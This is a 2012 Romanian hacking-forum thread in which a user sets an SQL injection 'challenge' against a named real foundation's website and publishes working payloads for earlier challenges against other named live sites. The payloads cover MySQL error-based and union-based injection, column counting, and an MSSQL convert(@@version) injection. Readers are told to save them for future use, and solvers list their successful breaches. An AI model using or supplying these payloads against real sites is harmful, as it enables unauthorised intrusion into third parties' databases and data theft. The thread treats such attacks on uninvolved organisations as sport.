Sheyken Posted August 8, 2012 Report Posted August 8, 2012 (edited) Dragii mei "Challengeisti" prin postarea acestui challenge, ma voi retrage pentru un anumit timp din aceasta categorie.De ce ? [ Pentru ca nu mai am site-uri vulnerabile. ]O sa mai caut si voi reveni sa facem alte challenge-uri.-----------------------------------------------------------[+]Target: Fundación Antena 3[+]Document: Oracle XML Injection[+]Image: Cerinte:---------------------------Sintaxa se trimite prin PMPostarea unui ScreenShoot este obligatoriePentru rezolvarea acestui challenge este necesar sa postati versiunea bazei de date.---------------------------Solvers:DarkyAngel [ # 1 ]totti93 [ # 2 ]Wubi [ # 3 ]caramea [ # 4 ] ____ | __ ) ___ _ __ _ _ ___ | _ \ / _ \| '_ \| | | / __|| |_) | (_) | | | | |_| \__ \|____/ \___/|_| |_|\__,_|___/M-am gandit ca, odata cu terminarea primei "sesiuni" de challenge-uri sa postez rezolvarile de la challenge-urile trecute.Challenge 1https://rstcenter.com/forum/56878-medium-hard-mysql-injection-challenge.rstSintaxa: News | Puerto Rico Islanders or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 -- [ MySQL Injection Error Based ].-----------------------------------------------------------------------Challenge 2https://rstcenter.com/forum/57020-easy-medium-mysql-injection-challenge.rstSintaxa se putea face de 2 feluri.Error based & Union based.Error based -> SIGMA or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 --Union Based -> SIGMA and 1=2 union select 1,2,3,4,5,6,7,8,9,10,version(),12,13 /*---------------------------------------------------Challenge 3https://rstcenter.com/forum/57037-medium-hard-sql-injection-challenge.rstAici mai mult e funny si putina logica. Doar 3 au reusit sa rezolve acest challenge. Explicatia:Arabi atunci cand adaugati apostroful langa ?id=2 va apare urmatoarea erroare -> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\')' at line 1SQL: SELECT * FROM `spsinglepage` WHERE (`id` = 2\')Numarul de coloane il veti afla prin urmatorul query -> Arabi and (select * from spsinglepage)=(select 1) [B][COLOR="#00FF00"]Operand should contain 8 column(s)[/COLOR][/B]SQL: SELECT * FROM `spsinglepage` WHERE (`id` = 2 and (select * from spsinglepage)=(select 1)) Si asa, injectia se face in felul urmator -> Arabi) union (select 1,2,3,4,5,6,7,8-----------------------------------------------------Challenge 4https://rstcenter.com/forum/57056-easy-medium-mssql-injection-challenge.rstSintaxa: Bradford Chamber | News or 1=convert(int,(@@version))--Sintaxa facut de totti93 [ union based ] --> Bradford Chamber | News-----------------------------------------------------Pe final as dori ca voi, sa va notati aceste sintaxe, undeva in pc pentru ca azi ati invatat ceva nou [majoritatea] de aceste sintaxe veti avea nevoie in viitor [ poate va intalniti cu o problema, iar una din sintaxele de mai sus este cheia rezolvari ].Am sa incerc sa revin cu noi provocari.Va multumesc pentru rabdarea pe care ati avut-o. Edited August 8, 2012 by Sheyken 2 Quote
Sheyken Posted August 8, 2012 Author Report Posted August 8, 2012 Iti place sa o bagi toata a? Adaugat la lista de solvers. Quote
cronix Posted August 8, 2012 Report Posted August 8, 2012 Foarte frumos din partea ta,rar vezi pe cineva care sa posteze solutiile la sfarsitul unu challenger ceea ce esti si normal,pentru a putea "invata,pricepe" si altii.Totusi ar fi o mica observati,frumos era daca postai user:si sintaxa trimisa la fiecare in parte. Quote
Sheyken Posted August 8, 2012 Author Report Posted August 8, 2012 (edited) Trecut la lista de solvers. O sa vina FBI-u dupa tine pentru ca ai vazut baza de date. Edited August 9, 2012 by Sheyken Quote
Sho0ter Posted August 11, 2012 Report Posted August 11, 2012 Easy one.Thanks for the challenge. Quote
Sheyken Posted August 11, 2012 Author Report Posted August 11, 2012 Sho0ter, next time if you no pm me with the syntax i gonna ignore you in the all challenges. Quote
hades Posted August 11, 2012 Report Posted August 11, 2012 Nu fi asa rau cu el. E bine intentionat omu . Quote